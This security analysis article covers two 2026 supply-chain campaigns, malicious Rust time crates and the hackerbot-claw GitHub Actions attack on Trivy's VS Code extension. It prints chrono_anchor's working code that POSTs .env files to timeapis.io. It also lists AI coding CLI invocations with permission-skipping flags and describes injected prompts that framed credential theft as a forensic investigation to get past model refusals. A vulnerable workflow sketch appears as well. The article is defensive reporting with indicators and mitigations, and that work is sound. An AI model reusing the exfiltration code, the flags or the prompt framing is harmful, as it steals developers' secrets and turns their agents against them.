In late February 2026, two coordinated attack campaigns hit the developer ecosystem at the same time. Five malicious Rust packages quietly stole environment secrets from developer machines and CI pipelines. Simultaneously, an AI-powered GitHub bot scanned open-source repositories for misconfigured workflows and used a stolen token to push poisoned VS Code extension releases that weaponized developers' own AI coding tools against them.
Both campaigns were discovered and documented primarily by Socket's Threat Research Team and StepSecurity, with follow-up disclosure from Aqua Security. The incidents share a common target — the developer build environment — and a common prize: secrets, tokens, and credentials that live in the spaces between source code and production. Neither campaign required sophisticated zero-day exploitation. Both demonstrate that the weakest link in the software supply chain is often trust: trust placed in a new package, trust extended to a pull request, and trust baked into automation that runs without human review.
The Five Malicious Rust Crates
Socket's Threat Research Team uncovered five malicious crates published to crates.io, the official Rust package registry, between late February and early March 2026. The five packages were:
- chrono_anchor
- dnp3times
- time_calibrator
- time_calibrators
- time-sync
All five presented themselves as time-synchronization utilities — specifically, tools that could calibrate local system time without relying on the Network Time Protocol (NTP). That framing was deliberate. In restricted network environments and automated CI pipelines where outbound NTP traffic is blocked or undesirable, a lightweight local time-calibration package is a plausible dependency. The pitch lowered reviewer skepticism and made the packages look like they solved a real operational problem.
In reality, their core function was credential and secret theft. Kirill Boychenko of Socket's Threat Research Team characterized the packages plainly in his published analysis: while presenting as time utilities, their real purpose was to harvest credentials and secrets from developer environments, particularly .env files, and send that data to attacker-controlled infrastructure. Socket's report described their function as "credential and secret theft" in direct terms. (Kirill Boychenko, Socket Threat Research Team, socket.dev, March 10, 2026.)
Socket assessed with high confidence that all five packages belonged to the same threat actor, based on shared exfiltration infrastructure, repeated code patterns, and identical logic. All five packages sent stolen data to a single lookalike domain: timeapis[.]io — a typosquat of the legitimate time API service timeapi.io. The extra letter "s" is the only visual difference.
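The single-character difference between timeapi.io and timeapis[.]io also illustrates how mechanically detectable this class of lookalike is. The sketch below is illustrative, not part of Socket's tooling: a classic Levenshtein edit-distance check that flags any dependency or domain name within one or two edits of a trusted name, without matching it exactly. The function names and the threshold of two edits are assumptions chosen for the example.

```rust
/// Classic dynamic-programming Levenshtein edit distance between two strings.
fn edit_distance(a: &str, b: &str) -> usize {
    let (a, b): (Vec<char>, Vec<char>) = (a.chars().collect(), b.chars().collect());
    let mut prev: Vec<usize> = (0..=b.len()).collect();
    for (i, ca) in a.iter().enumerate() {
        let mut cur = vec![i + 1];
        for (j, cb) in b.iter().enumerate() {
            let cost = if ca == cb { 0 } else { 1 };
            // min of substitution (diagonal), deletion (above), insertion (left)
            cur.push((prev[j] + cost).min(prev[j + 1] + 1).min(cur[j] + 1));
        }
        prev = cur;
    }
    prev[b.len()]
}

/// Flag names suspiciously close to, but not equal to, a trusted name.
fn looks_like_typosquat(candidate: &str, trusted: &[&str]) -> Option<String> {
    trusted.iter().find_map(|t| {
        let d = edit_distance(candidate, t);
        (d > 0 && d <= 2).then(|| format!("{candidate} is {d} edit(s) from {t}"))
    })
}

fn main() {
    let trusted = ["timeapi.io", "dnp3time", "chrono"];
    // timeapis.io is one insertion away from timeapi.io
    assert!(looks_like_typosquat("timeapis.io", &trusted).is_some());
    // An exact match of a trusted name is not a typosquat
    assert!(looks_like_typosquat("timeapi.io", &trusted).is_none());
    println!("ok");
}
```

Registries and internal allowlist tooling can run a check like this against new dependency names at review time; it would have flagged both timeapis[.]io and dnp3times against their legitimate counterparts.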
The threat actor also used name selection to maximize accidental installs. dnp3times typosquats the legitimate dnp3time crate. chrono_anchor borrows the recognition of the widely-used chrono ecosystem and appends anchor to look like a companion package. time_calibrator, time_calibrators, and time-sync imitate harmless-sounding utility names that are easy to overlook during a dependency review.
RustSec, the security advisory database for the Rust ecosystem, documented that time_calibrators was removed roughly three hours after publication with no evidence of actual downloads. dnp3times was pulled within about six hours. time-sync was removed in approximately fifty minutes. chrono_anchor was still live on crates.io when Socket first flagged it; the crates.io security team removed it and suspended the publisher account after Socket filed an abuse report.
Adam Harvey of the crates.io team confirmed the removal in Socket's published report, expressing appreciation for Socket's ongoing malware reporting and noting that the crates.io security team looks forward to continued collaboration with Socket's Threat Research Team on keeping the ecosystem secure. (socket.dev, March 10, 2026)
The threat actor operated under several aliases. The chrono_anchor manifest hardcoded the author email gehakax777@kaoing[.]com and linked to a GitHub account at github[.]com/suntea279491, which returned a 404 at the time of writing. The package was published on crates.io under the account dictorudin, which linked to github[.]com/dictorudin, also showing no public repositories. A second email, jack@kaoing[.]com, appeared in another crate from the same cluster, suggesting the actor rotated identities while continuing to rely on the same disposable email domain.
How chrono_anchor Hid Its Exfiltration Logic
The four simpler crates performed straightforward exfiltration of .env files with minimal obfuscation. chrono_anchor went further. Its exfiltration logic lived inside a file named guard.rs, invoked from routine-looking parameter validation helpers and an "optional sync" function — code paths that a developer reviewing dependencies would not expect to trigger any network activity.
The attack sequence worked in three steps. First, the crate generated cover traffic by constructing an HTTPS URL pointing to the legitimate timeapi.io and calling it with curl in silent mode with a three-second timeout. This made initial network activity look like a genuine time check. Second, it derived the exfiltration endpoint by appending a single character to the same hostname constant — changing timeapi to timeapis — and downgrading the connection to plain HTTP. Third, it spawned a background thread, waited one second to reduce timing correlation, and uploaded the local .env file to that endpoint via a multipart form POST:
```rust
const REF_HOST: &str = "timeapi";
const REF_PATH: &str = "/api/Time/current/zone?timeZone=UTC";

fn fetch_ref_background() {
    std::thread::spawn(|| {
        // Cover traffic — appears as a legitimate time check
        let url = format!("https://{}.io{}", REF_HOST, REF_PATH);
        let _ = std::process::Command::new("curl")
            .args(["-s", "-m", "3", url.as_str()])
            .output();
    });
}

fn submit_snapshot() {
    std::thread::spawn(|| {
        std::thread::sleep(std::time::Duration::from_secs(1));
        // Exfiltration endpoint: http://timeapis[.]io/...
        let ep = format!("http://{}s.io{}", REF_HOST, REF_PATH);
        let form_arg = format!("file=@{}", crate::paths::ENV_FILE_PATH);
        let _ = std::process::Command::new("curl")
            .args(["-s", "-X", "POST", ep.as_str(), "-F", form_arg.as_str()])
            .output();
    });
}
```
.env files are routinely used to store API keys, cloud provider credentials, GitHub tokens, database passwords, and registry secrets outside of version control. In a CI pipeline, a single .env exfiltration can hand an attacker everything needed to pivot into cloud environments, impersonate the build system, or poison downstream package releases. The file does not need to be committed to a repo to be dangerous — it only needs to exist on disk when the malicious code path executes.
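For concreteness, a hypothetical .env file of the kind these crates targeted. Every value below is a placeholder, but the shape is representative: one plaintext file aggregating database, cloud, source-control, and registry credentials.

```
# Hypothetical .env file; all values are placeholders
DATABASE_URL=postgres://app:s3cr3t@db.internal:5432/prod
AWS_ACCESS_KEY_ID=AKIAXXXXXXXXXXXXXXXX
AWS_SECRET_ACCESS_KEY=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
GITHUB_TOKEN=ghp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
NPM_TOKEN=npm_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
```

A single POST of a file like this hands an attacker four distinct pivot points at once.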
Notably, the malicious code in chrono_anchor did not establish persistence through a service or scheduled task. Instead, it relied on repeated execution: every time a developer or CI workflow hit the affected code path, it attempted to exfiltrate .env secrets again. In automated build environments, that means each pipeline run was a new exfiltration opportunity.
hackerbot-claw and the GitHub Actions Campaign
Running concurrently with the Rust crate campaign, an AI-powered GitHub account named hackerbot-claw conducted an automated attack against CI/CD pipelines across major open-source repositories. StepSecurity documented the campaign in detail. The GitHub account described itself as an "autonomous security research agent" — framing the bot as benign while it systematically targeted developer infrastructure.
Between February 21 and February 28, 2026, hackerbot-claw targeted at least seven repositories belonging to organizations including Microsoft, Datadog, and Aqua Security. The attack methodology followed a consistent playbook:
- Scan public repositories for misconfigured GitHub Actions workflows, specifically those using the pull_request_target trigger.
- Fork the target repository.
- Open a pull request with a trivial, innocuous-looking change, such as a typo fix or minor documentation edit, while concealing the malicious payload in the branch name, a file name, or an embedded CI script.
- Allow the CI pipeline to trigger automatically when the pull request was created, executing the malicious code on the build server.
- Harvest secrets, tokens, and access credentials from the build environment.
The pull_request_target workflow trigger is particularly dangerous when misconfigured. Unlike the standard pull_request trigger, it runs in the context of the base repository rather than the fork — meaning it can access repository secrets. When a maintainer has not restricted which pull requests can trigger this workflow, an external contributor (or an automated bot) can cause privileged code execution simply by opening a pull request.
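A minimal sketch of that misconfiguration, assembled for illustration rather than taken from any of the targeted repositories (the workflow name, secret name, and build command are hypothetical): a pull_request_target workflow that checks out the fork's code and then runs it with a repository secret in scope.

```yaml
# VULNERABLE sketch: do not use. Illustrates the misconfiguration only.
name: ci
on: pull_request_target   # runs in the base repo's context, with secret access

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          # Checks out the UNTRUSTED fork branch...
          ref: ${{ github.event.pull_request.head.sha }}
      # ...then executes its build scripts with a secret in the environment.
      - run: make test
        env:
          DEPLOY_TOKEN: ${{ secrets.DEPLOY_TOKEN }}
    ```

Any code the fork places in the build scripts invoked by `make test` runs with `DEPLOY_TOKEN` readable from its environment, which is exactly the execution the campaign relied on.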
Whether hackerbot-claw was fully autonomous is a question worth holding carefully. Pillar Security's analysis of the campaign, which they named Chaos Agent, concluded that the most likely explanation is a human operator using an LLM as an execution layer — someone who selected targets, defined the technique classes, and made real-time strategic decisions, while the AI generated payloads, drafted pull requests, and handled rapid iteration. The "autonomous agent" framing in the bot's own profile description was partly functional and partly cover story. The operational infrastructure supported this reading: the account maintained a public Gist-based scoreboard that logged results after each attempt, and structured session identifiers appeared consistently across every pull request. That scoreboard is not something a fully unsupervised system builds and maintains; it is the artifact of someone tracking progress. Pillar's researchers noted that hackerbot-claw escalated its approach against awesome-go within eleven minutes of an initial failed attempt, and changed its OPSEC behavior after the Trivy compromise — both signals of adaptive human decision-making in the loop.
Are These Campaigns Connected?
The timing invites the question: are the Rust crate campaign and the hackerbot-claw operation the work of the same threat actor?
The short answer from the available evidence is: probably not, but the honest answer is that no one has publicly established either a link or a confirmed separation. Socket's analysis of the five Rust crates attributed them, with high confidence, to a single actor based on shared infrastructure, repeated code patterns, and the same exfiltration domain. StepSecurity's analysis of hackerbot-claw focused entirely on the GitHub Actions exploitation and did not draw any connection to the crate campaign. Neither report speculates about a common origin. The threat actors involved, if they are distinct, simply chose the same target — the developer build environment and its credential store — at the same time.
That convergence is worth pausing on. Two independent actors targeting .env files through different vectors, in the same week, against overlapping infrastructure (Aqua Security, an open-source security project) is not a coincidence that demands a single explanation. It reflects a shared understanding in the attacker community about where developer credentials live and how to reach them. The techniques differ — package typosquatting versus GitHub Actions exploitation versus stolen publisher tokens — but the prize is identical. Treating these as isolated incidents obscures a more accurate framing: developer build environments are currently a high-priority target class, and multiple actors are pursuing them through whatever vectors are available.
The absence of attribution for either campaign also matters beyond the headline. No government body has named a responsible actor. No ransomware group has claimed credit. The timeapis[.]io registration and the identity aliases associated with the Rust crates point to operational infrastructure that was disposable by design — registration details that were either false or quickly abandoned after takedown. hackerbot-claw's GitHub account similarly went dark. This anonymity is itself a data point: campaigns like these carry low risk of consequence for the actors behind them, which makes them attractive regardless of the eventual ROI on any particular stolen credential.
The Trivy Extension Compromise (CVE-2026-28353)
The highest-profile target of hackerbot-claw was aquasecurity/trivy, the popular open-source security scanner used by security teams worldwide to detect vulnerabilities, misconfigurations, and exposed secrets in container images and filesystems. The attacker exploited a pull_request_target workflow vulnerability in the Trivy repository to steal a Personal Access Token (PAT).
StepSecurity's published analysis documented how the attacker used the misconfigured workflow to extract a Personal Access Token, then used that stolen credential to take over the Aqua Security repository entirely. (stepsecurity.io, 2026)
With the stolen PAT, the attacker authenticated as a legitimate Aqua Security publisher and pushed two malicious versions of the Trivy VS Code extension to the Open VSX registry — the primary extension marketplace for VS Code-compatible editors outside of Microsoft's own marketplace. The affected versions were 1.8.12 (published February 27, 2026, at 12:04 UTC) and 1.8.13 (published February 28, 2026, at 16:28 UTC).
The OpenVSX publisher account used to push the extensions belonged to a former Aqua Security employee. When Socket contacted him directly, he revoked the publishing token and removed the affected versions from the registry the same day. Both malicious versions were removed by February 28, 2026 at 22:46 UTC.
The incident is formally tracked as CVE-2026-28353.
The Damage Beyond Credential Theft
The exfiltration of secrets was not the only outcome at Aqua Security. After gaining authenticated access through the stolen PAT, hackerbot-claw deleted approximately 97 software releases from the Trivy repository and wiped roughly 32,000 GitHub stars from the project. Stars function as a trust signal across the open-source ecosystem: they inform adoption decisions, surface projects in search rankings, and indicate community confidence. Erasing them does not just damage visibility; it erodes the social proof that drives new developers to evaluate a tool in the first place.
That combination — secrets stolen, releases deleted, reputation damaged — illustrates a threat model that extends past the traditional credential-theft framing. The attacker did not need to distribute poisoned builds downstream to cause harm. Disrupting the project's distribution history and degrading its public standing were themselves meaningful outcomes. For maintainers and security teams assessing the risk of a GitHub Actions misconfiguration, the question is not only what secrets live in the build environment, but what an authenticated session on the repository can do to the project's integrity and public record.
What Happens After the Exfiltration
The article so far has described what was taken. The question it has not yet asked is what the attacker could do with it.
Neither Socket nor StepSecurity has publicly documented confirmed downstream use of the stolen credentials — no attributed intrusion, no ransomware deployment, no poisoned downstream release that has been traced back to this campaign. That absence is notable for a few reasons, none of them reassuring.
First, credential theft and credential use are often separated by weeks or months. Stolen tokens are frequently sold through underground markets rather than used directly. A GITHUB_TOKEN with write permissions to a widely-used open-source project is a valuable commodity independent of whether the actor who stole it has an immediate use case. The exposure window and the downstream impact window are different intervals, and the second one does not always become visible in the same news cycle as the first.
Second, the attacker's collection problem may have limited what was actually recovered. Version 1.8.12 of the compromised Trivy extension was designed to scatter exfiltrated data across every available outbound channel simultaneously, with no clean collection point. Version 1.8.13 improved the architecture by routing findings to a repository under the victim's own GitHub account — but that repository defaults to private, and there is no confirmed evidence the attacker successfully accessed it. What this means in practice is that the attacker may have designed a more sophisticated exfiltration mechanism than they were able to operationalize. The gap between what a campaign attempts and what it successfully collects is rarely public.
Third, for the Rust crate campaign, every .env file successfully POSTed to timeapis[.]io was delivered to infrastructure the attacker controlled. Those requests completed before any advisory existed. Developers who hit the affected code path — including every automated CI job that compiled a project with one of the five crates in its dependency tree — had no visibility into the outbound request. The credentials exfiltrated through that channel could have been used, sold, or abandoned; there is no public record of which occurred.
Organizations that treat a takedown as a resolution should read the timeline differently: the crates are gone, but the data they collected is not. Credential rotation for any machine or CI environment that ran these packages during their live window is not optional hygiene — it is the only way to close the exposure.
What the Injected AI Prompts Were Designed to Do
The most technically novel element of this attack was not the token theft. It was what the attacker did with the stolen access. Rather than injecting traditional malware code with hardcoded network callbacks, the compromised extension contained natural-language prompts that instructed locally installed AI coding assistants to perform the reconnaissance and exfiltration on the attacker's behalf.
Both versions injected code into the extension's workspace activation function — the function that runs every time a developer opens a project in their editor. The injected code attempted to execute five AI coding tools in their most permissive, unattended modes:
```
claude -p --dangerously-skip-permissions --add-dir /
codex exec --ask-for-approval never --sandbox danger-full-access
gemini prompt --yolo --no-stream
copilot --autopilot --yolo -p
kiro-cli chat -a --no-interactive
```
All five processes were spawned detached with stdio: "ignore", meaning the user would see nothing while the extension continued to function normally. Whichever AI tool happened to be installed would silently execute. Errors were swallowed. The extension's legitimate Trivy scanning behavior continued in parallel, providing cover.
Version 1.8.12 — Mass Reconnaissance
The first injected prompt was approximately 2,000 words long. It assigned the AI agent the role of a "forensic analysis investigator" and instructed it to search the system for evidence of security compromise, financial crimes, credential theft, insider trading indicators, and regulatory violations. The forensic framing was deliberate. As Socket's researchers noted, an AI model presented with a direct instruction to steal credentials would likely refuse. Framed as a legitimate internal investigation with chain-of-custody requirements, the same actions fell within what the model considered authorized and compliant behavior.
The prompt instructed the agent to discover every available outbound communication channel on the system — email clients, messaging platforms, file transfer services, ticketing systems, external gateways — and push the collected findings through all of them simultaneously. The explicit goal was to "maximize the probability that findings reach appropriate recipients and cannot be contained or suppressed." In practice, that meant credentials, tokens, and internal data scattered across an uncontrolled set of destinations with no reliable collection point for the attacker. Socket assessed this version as more chaotic than targeted.
Version 1.8.13 — Targeted Exfiltration via the Victim's Own GitHub Account
The second version replaced the sprawling reconnaissance prompt with something far more focused. The injected instruction told the AI agent to assess the host system for installed tools, authentication sessions, and tokens, write the findings to a file called REPORT.MD, and then — if the GitHub CLI was present and authenticated — create a new repository under the victim's own GitHub account named posture-report-trivy and commit the report to it.
This was a meaningful refinement. Version 1.8.12 scattered data everywhere but gave the attacker no reliable way to collect the output. Version 1.8.13 used the victim's own authenticated GitHub session as a clean exfiltration channel. However, the gh CLI defaults to creating private repositories, which would make the exfiltrated data visible only to the victim's own account, not necessarily to the attacker. Socket confirmed that no public repositories named posture-report-trivy existed at the time of their investigation, suggesting the practical impact of this version was likely limited.
Socket's researchers characterized the two versions as iterations on a common problem: the first prompt broadcast stolen data through too many simultaneous channels, giving the attacker no reliable way to collect the output. The second version addressed that by routing exfiltrated data through the victim's own authenticated GitHub account — a cleaner channel, but one whose usefulness depended on repository visibility settings the attacker could not control. Socket's conclusion was that version 1.8.13 fixed the collection problem in theory while potentially pushing results to a private repository the attacker could never access. (Peter van der Zee and Philipp Burckhardt, Socket, socket.dev, March 2, 2026)
For a system to be meaningfully affected by either version, the following conditions all needed to be true: the user had installed version 1.8.12 or 1.8.13 from Open VSX; at least one of the five targeted AI coding CLI tools was installed locally; that CLI accepted the permissive execution flags provided; the agent could access sensitive data on disk; and for version 1.8.13, the GitHub CLI was installed and authenticated. If none of the five AI tools were present, the injected code would execute and fail silently.
What makes this technique significant is not the specific outcome of this campaign but the method itself. The attacker offloaded the malicious behavior entirely to AI agents that already had legitimate access to the developer's filesystem, credentials, and authenticated tooling. The malicious intent was expressed in natural language rather than code, which bypasses most conventional software composition analysis tools that scan for suspicious function calls, hardcoded endpoints, or known malware signatures. Socket's researchers described this as an emerging form of AI-assisted supply chain abuse: social engineering adapted for the age of AI agents.
The One Defense That Worked
Of the repositories targeted across the 37-hour campaign, one blocked the attack at the point of execution. Ambient Code, a smaller open-source project, had configured its CI workflow to route pull requests through Claude Code for automated review. When hackerbot-claw submitted its malicious pull request, Claude Code identified the injected instructions as adversarial and blocked execution — in approximately 82 seconds. Pillar Security described it as the only control in the entire campaign that stopped an attack before it ran.
That outcome does not make a general case for AI code review as a security control; a single instance against a single attack pattern is a data point, not a benchmark. What it does illustrate is the point the article's final takeaway approaches but does not fully reach: detection has to move upstream of execution. The standard controls — secret scanning, dependency audits, SAST — operate on artifacts that already exist. The Trivy extension's 2,000-word forensic prompt does not produce an artifact that those tools examine. The only layer that could catch it was one positioned to evaluate the prompt's intent before any code ran.
The broader implication for organizations running AI-assisted CI workflows is that the same agents being evaluated for their ability to catch bugs and security issues are also the agents an attacker will attempt to weaponize or circumvent. That dual role — potential defender and potential attack surface — makes the configuration of those agents, specifically which permissions they hold and whether they require human approval before acting, a security decision, not just a developer-experience preference.
There is a sharper version of this question that the Ambient Code outcome raises but does not answer: if you configure an AI agent to review pull requests on your behalf, and the attacker submits a pull request designed to manipulate that reviewer, are you more or less secure than if no AI reviewer existed? The Ambient Code case landed on the favorable side of that question. But the favorable outcome depended on the AI correctly identifying adversarial intent in a prompt crafted specifically to look legitimate. That is a probabilistic defense, not a deterministic one. An attacker who knew that Claude Code was the reviewer could iterate on their prompt until it passed — exactly the kind of adaptive behavior Pillar Security observed hackerbot-claw exhibiting against other targets. The 82-second block is a real outcome; treating it as a reliable control model requires evidence from a much larger sample of adversarial prompts than a single campaign provides.
The structural point stands regardless: detection needs to move upstream of execution, and AI reviewers positioned before the code runs are the only layer that can evaluate the intent of a natural-language payload. What needs to accompany that capability is an honest accounting of its failure modes — not because the approach is wrong, but because any defense built on probabilistic reasoning about adversarial intent needs redundant controls underneath it, not above it.
Indicators of Compromise
| Type | Indicator |
|---|---|
| Malicious Rust crate | chrono_anchor |
| Malicious Rust crate | dnp3times |
| Malicious Rust crate | time_calibrator |
| Malicious Rust crate | time_calibrators |
| Malicious Rust crate | time-sync |
| Exfiltration domain | timeapis[.]io |
| Exfiltration URL | http://timeapis[.]io/api/Time/current/zone?timeZone=UTC |
| Threat actor alias (crates.io) | dictorudin |
| Threat actor alias | gehakax777 |
| Threat actor alias (GitHub) | suntea279491 |
| Threat actor email | gehakax777@kaoing[.]com |
| Threat actor email | jack@kaoing[.]com |
| Compromised VS Code extension | aquasecurityofficial.trivy-vulnerability-scanner 1.8.12 (Open VSX) |
| Compromised VS Code extension | aquasecurityofficial.trivy-vulnerability-scanner 1.8.13 (Open VSX) |
| CVE | CVE-2026-28353 |
| Suspicious repo artifact | GitHub repository named posture-report-trivy under victim account |
| Suspicious file artifact | REPORT.MD created in a project or working directory |
MITRE ATT&CK mappings for the Rust crate campaign include: T1195.002 (Supply Chain Compromise), T1204 (User Execution), T1036 (Masquerading), T1552.001 (Credentials In Files), T1005 (Data from Local System), T1583.001 (Acquire Infrastructure: Domains), T1071.001 (Application Layer Protocol: Web Protocols), and T1041 (Exfiltration Over C2 Channel).
Defenses That Address the Root Causes
Generic advice on supply chain attacks tends to converge on the same short list: pin your dependencies, run a scanner, review new packages. Those controls are not wrong, but they operate at the wrong layer for the techniques demonstrated here. The following defenses address the specific failure modes this campaign exploited.
Stop Treating .env Files as Out-of-Scope for Secrets Management
The persistent centrality of .env files as the primary exfiltration target across supply chain campaigns is a structural problem, not a configuration gap. The .env convention aggregates every secret a developer needs in one plaintext file that any process on the system can read. The fix is not adding .env to .gitignore — that is table stakes. The deeper solution is eliminating the file as a secrets source for anything other than local developer testing.
In CI/CD environments, secrets should be injected at runtime from a dedicated secrets management service — HashiCorp Vault, AWS Secrets Manager, Azure Key Vault, Google Secret Manager — scoped to the minimum set of secrets the specific job requires. A build job that compiles code does not need database credentials. A job that runs unit tests does not need production API keys. Each job should receive exactly the secrets it will use and nothing more. When a malicious dependency executes inside that job, it inherits only that job's scoped secrets, not the full set of credentials your team maintains. This is least-privilege applied to secrets, not just to permissions.
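As a sketch of that scoping in GitHub Actions terms (job names and the secret name are hypothetical; the same structure applies to any CI system), each job receives only the secret it uses rather than loading a shared .env:

```yaml
# Hypothetical: per-job secret scoping instead of one shared .env
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: cargo build --release   # no secrets in scope at all

  publish:
    needs: build
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: cargo publish
        env:
          # Only the publish job ever sees the registry token.
          CARGO_REGISTRY_TOKEN: ${{ secrets.CARGO_REGISTRY_TOKEN }}
```

A malicious dependency executing inside the build job in this layout exfiltrates nothing, because nothing is there.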
For developer machines, short-lived credential injection via tools like direnv combined with secrets backends that rotate credentials frequently limits the damage window of any individual machine compromise. If a stolen .env snapshot contains credentials that expire in four hours, the operational impact is bounded regardless of whether the attacker successfully received the file.
Treat Dependency Installation as Code Execution — Because It Is
The four simpler Rust crates performed their exfiltration at build time. chrono_anchor did the same. Every package that includes a build script, a procedural macro, or initialization logic that runs during compilation or import has the ability to execute arbitrary code on your machine or CI worker the moment you install it. This is not a Rust-specific issue — npm install scripts, Python package setup hooks, and Go init functions carry identical risk.
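To make the build-time execution point concrete, here is a benign sketch, not taken from any of the malicious crates, of the capability a build script holds. The function name and probed path are illustrative; the point is that code like this, placed in a crate's build.rs, runs as an ordinary process during cargo build with the invoking user's full filesystem access, before any of the crate's "real" code is ever called.

```rust
use std::fs;
use std::path::Path;

/// Anything a build script can do, this function can do: it runs with the
/// full privileges of whoever invoked `cargo build`.
fn peek_at_file(path: &str) -> Option<usize> {
    // Returns the byte length of the file if it exists and is readable.
    Path::new(path)
        .exists()
        .then(|| fs::read(path).ok().map(|bytes| bytes.len()))
        .flatten()
}

fn main() {
    // In a real build.rs this probe would run silently during `cargo build`.
    match peek_at_file(".env") {
        Some(n) => println!("cargo:warning=.env readable at build time ({n} bytes)"),
        None => println!("cargo:warning=no .env in the build directory"),
    }
}
```

Replace the println! with an HTTP POST and this is, structurally, the four simpler crates.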
The practical response is to extend the security review boundary to include the point of installation, not just the point of code execution. Tools built specifically for this — Socket's behavioral analysis for npm and crates, Phylum for Python and npm, cargo-vet for Rust — evaluate what a package actually does when installed rather than checking its name against a known-malware list. Name-hash checks catch packages that have already been reported. Behavioral pre-install analysis catches packages that are currently live and have not yet been flagged. That distinction — retrospective versus prospective detection — is the gap this campaign exploited. chrono_anchor was still available for installation when Socket identified it. Developers who had installed it in the previous days had no advisory to consult.
Integrating Socket's socket CLI or Phylum into CI pre-install steps — running before cargo build or npm install, not after — means suspicious packages are blocked before they execute. The policy can be configured to block on specific risk signals (network access in build scripts, file system access outside the package directory, spawning child processes) rather than requiring a full malware designation before acting.
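A sketch of that ordering in a GitHub Actions job, assuming cargo-vet has been initialized for the repository (step layout is illustrative; Socket's and Phylum's CLIs slot into the same position). What matters is that the dependency check runs before anything compiles:

```yaml
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      # Dependency review runs BEFORE any build script can execute.
      - run: cargo install cargo-vet
      - run: cargo vet          # fails the job if a dependency lacks an audit
      - run: cargo build --release
```

Running the check after `cargo build` would defeat the purpose: by then, every build script in the dependency tree has already executed.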
Lock Down pull_request_target With Explicit Conditional Logic
The pull_request_target trigger is not inherently dangerous; it exists because some legitimate CI patterns — labeling pull requests, posting comments, updating status checks — require access to repository secrets that fork-based workflows cannot have. The problem is that the same trigger, configured carelessly, runs arbitrary code from a fork with full access to those same secrets.
The mitigation is not disabling the trigger but restricting it with explicit conditions. Workflows using pull_request_target should separate the privileged and unprivileged stages: the stage that checks out and runs untrusted code from a fork should use pull_request, not pull_request_target, and should have no access to repository secrets. The stage that posts results, applies labels, or updates external systems should use pull_request_target but must never check out code from the fork. GitHub's own documentation covers this separation, but it is not enforced by default, and many workflows in production do not implement it.
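The unsafe pattern is mechanical enough to check for automatically. Below is a minimal sketch of such a check using plain string heuristics rather than a full YAML parse; the function name and heuristics are illustrative, not part of any StepSecurity or GitHub tool.

```python
def flags_unsafe_workflow(workflow_text: str) -> bool:
    """Flag workflows that combine pull_request_target with a checkout of
    the fork's code -- the combination that exposes repository secrets to
    untrusted pull requests. String heuristic, not a full YAML parse."""
    uses_privileged_trigger = "pull_request_target" in workflow_text
    checks_out_fork_code = ("github.event.pull_request.head" in workflow_text
                            or "github.head_ref" in workflow_text)
    return uses_privileged_trigger and checks_out_fork_code

# A privileged workflow that checks out and runs the fork's head ref: unsafe.
unsafe = """
on: pull_request_target
jobs:
  build:
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: ./untrusted-build.sh
"""

# A privileged workflow that only labels the PR and never touches fork code: passes.
safe = """
on: pull_request_target
jobs:
  label:
    steps:
      - uses: actions/labeler@v5
"""

print(flags_unsafe_workflow(unsafe), flags_unsafe_workflow(safe))  # True False
```

Running a check like this across .github/workflows/ in CI turns the audit described above from a one-time manual review into a standing guardrail.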
Organizations running public repositories should audit every workflow using pull_request_target to verify that no checkout step on fork code precedes any use of repository secrets. StepSecurity's Harden-Runner can detect and alert on this pattern in existing workflows, and their free GitHub Actions security audit tool surfaces these misconfigurations across a repository without requiring workflow changes first.
Revoke Publishing Credentials for Departed Employees Immediately — Not Eventually
The Trivy extension compromise was made possible by an unexpired publishing token belonging to a former Aqua Security employee. This is the failure that turned a GitHub Actions exploitation into a supply chain attack affecting end users. The token gave the attacker authenticated access to a trusted publisher namespace on Open VSX — something no amount of pre-publication scanning addresses if the publisher identity appears legitimate.
The control is not technical; it is procedural. Offboarding checklists for developers who hold publishing access to package registries, extension marketplaces, or CI/CD deployment pipelines must include explicit token revocation steps with verification. The verification matters: it is not enough to remove access in one system if the token was generated in another. For crates.io, Open VSX, npm, PyPI, and similar registries, verify that tokens linked to the departing employee's account are fully revoked and that the namespace's authorized publisher list reflects current staff. Scheduled quarterly audits of publishing credentials across all registries your team maintains — not just the ones that had a recent incident — surface stale access before an attacker finds it.
Configure AI Coding Agents as Security Decisions, Not Convenience Preferences
The injected prompts in the Trivy extension compromise targeted Claude Code, Codex, Gemini CLI, Copilot, and Kiro with their most permissive execution flags. Those flags exist for legitimate use cases, but they represent a security posture: an AI agent running with --dangerously-skip-permissions and full filesystem access is, by design, an agent that will not ask before acting.
Treating the configuration of AI coding agents as a security decision means establishing organizational defaults rather than leaving each developer's installation to personal preference. Concretely: require human approval for file writes outside the current project directory; disable or explicitly gate the flags that allow unattended execution with full filesystem scope; and log all AI agent invocations — the prompt sent, the tool called, and the output produced — to a centralized store that security teams can audit. The logging is what enables detection of the pattern this attack used: a process invoking an AI agent at workspace activation with a prompt the developer did not write.
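A sketch of what gating and logging could look like at the invocation boundary. The flag --dangerously-skip-permissions comes from this incident's advisory; the other blocked flags and the wrapper itself are hypothetical organizational policy, not a published tool.

```python
import json, time

# Flags that put an agent into unattended, full-scope execution.
# --dangerously-skip-permissions is the Claude Code flag named in the
# advisory; treat the rest of the set as organization-specific placeholders.
BLOCKED_FLAGS = {"--dangerously-skip-permissions", "--yolo", "--auto-approve"}

def vet_agent_invocation(argv: list[str], log_path="agent-audit.jsonl") -> bool:
    """Append the invocation to an audit log, then return False if it
    uses a blocked flag. A policy sketch, not a drop-in wrapper."""
    blocked = sorted(BLOCKED_FLAGS.intersection(argv))
    with open(log_path, "a") as log:
        log.write(json.dumps({"ts": time.time(), "argv": argv,
                              "blocked_flags": blocked}) + "\n")
    return not blocked

print(vet_agent_invocation(["claude", "-p", "summarize the diff"]))            # True
print(vet_agent_invocation(["claude", "--dangerously-skip-permissions"]))      # False
```

The log line is the important part: an entry showing an agent invoked at workspace activation with a prompt the developer never typed is exactly the signal this attack pattern leaves behind.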
